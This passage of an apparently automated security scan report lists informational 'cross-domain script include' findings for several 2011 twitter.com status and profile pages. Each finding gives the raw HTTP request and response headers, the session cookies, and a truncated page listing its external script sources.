Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQ0Mjg0MjI0MTM3NjI1NjoMY3NyZl9pZCIlMTdjZmE5ZGJlZjVk%250AM2JkM2I0YWIyZDA1MzE3NTdhYjE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--eff563544b6e766e02e277b4b06265fffbf2e5f3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.494. http://twitter.com/malsup/status/30442842241376256

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30442842241376256

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30442842241376256 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234387-93691-58325
ETag: "62764e954595cf3f36708f8dcf4c2e1d"
Last-Modified: Fri, 28 Jan 2011 17:06:27 GMT
X-Runtime: 0.08150
Content-Type: text/html; charset=utf-8
Content-Length: 13459
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQ0Mjg0MjI0MTM3NjI1NjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--143307db8c75b48669ad669d208411d3b8844eb3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.495. http://twitter.com/malsup/status/30442842241376256

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30442842241376256

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30442842241376256 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225100-10-9359
ETag: "d3ba17c903de7d4c4bec8cb1904cd217"
Last-Modified: Fri, 28 Jan 2011 14:31:40 GMT
X-Runtime: 0.06637
Content-Type: text/html; charset=utf-8
Content-Length: 13586
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQ0Mjg0MjI0MTM3NjI1NjoMY3NyZl9pZCIlMTZhNzJmNDdiNmFl%250ANTdhNjQ5NDJlNGE1ZTdlOWViNWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--f98f0ce1b37e7ecbf5ecb2ea52d936a1c830361d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.496. http://twitter.com/malsup/status/30772839023910912

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30772839023910912

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30772839023910912 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234387-96677-18464
ETag: "a56910b62beca5c75c9cd3388e52e3cd"
Last-Modified: Fri, 28 Jan 2011 17:06:27 GMT
X-Runtime: 0.05312
Content-Type: text/html; charset=utf-8
Content-Length: 13610
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc3MjgzOTAyMzkxMDkxMjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--ee3096bc63bd1d2f783e5f5c057e9459f04c996a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.497. http://twitter.com/malsup/status/30772839023910912

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30772839023910912

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30772839023910912 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-93635-34868
ETag: "78f139df4c6b6f726d8cd49448048d35"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.08978
Content-Type: text/html; charset=utf-8
Content-Length: 13741
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc3MjgzOTAyMzkxMDkxMjoMY3NyZl9pZCIlMzZjNjQyMjZiMjdi%250AYjEyMDg4ZmU0MGQ3MWFlM2M3M2I6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--31a7ec0c01289e70c33472c98a7cbc57bf724c53; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.498. http://twitter.com/malsup/status/30791740717801472

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30791740717801472

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30791740717801472 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225099-36426-16387
ETag: "bbfd230855643c7c5c801dcb171724e2"
Last-Modified: Fri, 28 Jan 2011 14:31:39 GMT
X-Runtime: 0.04229
Content-Type: text/html; charset=utf-8
Content-Length: 13835
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc5MTc0MDcxNzgwMTQ3MjoMY3NyZl9pZCIlNmUxODZiNjU4ZTgy%250ANDYyNTRlZTg4ODZmNjJjNmU4NGQ6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--15f2d85b856d1bb3a3b44fb108277df0186a6b99; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.499. http://twitter.com/malsup/status/30791740717801472

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30791740717801472

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30791740717801472 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-47255-25269
ETag: "d4aa7ab8b414958eeafd252d48c7544d"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.05744
Content-Type: text/html; charset=utf-8
Content-Length: 13835
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc5MTc0MDcxNzgwMTQ3MjoMY3NyZl9pZCIlM2ViNDhhMTdlMDQx%250AMTNkNjM4ZWNjZjJjNzM1YzRhNGI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--57098155f97d7c28fdd3d7868ba2f1b52affaed0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.500. http://twitter.com/malsup/status/30791740717801472

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/30791740717801472

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/30791740717801472 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234386-33465-9256
ETag: "269a2ca9b120a76fba83c788224974bd"
Last-Modified: Fri, 28 Jan 2011 17:06:26 GMT
X-Runtime: 0.06699
Content-Type: text/html; charset=utf-8
Content-Length: 13703
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc5MTc0MDcxNzgwMTQ3MjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--89f1fca28c083a40501fe8165cbadc608af527f1; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.501. http://twitter.com/mariamenounos

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /mariamenounos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mariamenounos HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
